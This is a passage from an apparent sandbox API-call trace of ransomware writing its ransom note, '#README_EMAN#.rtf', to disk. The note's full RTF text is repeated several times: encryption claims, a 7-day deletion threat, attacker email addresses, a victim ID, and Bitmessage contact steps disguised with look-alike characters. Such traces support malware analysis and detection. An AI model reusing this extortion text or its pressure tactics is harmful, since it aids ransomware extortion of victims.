nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0293.369] CloseHandle (hObject=0x2d4) returned 1 [0293.370] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\#readme_eman#.rtf")) returned 0xffffffff [0293.370] GetLastError () returned 0x2 [0293.370] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0293.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0293.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0293.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 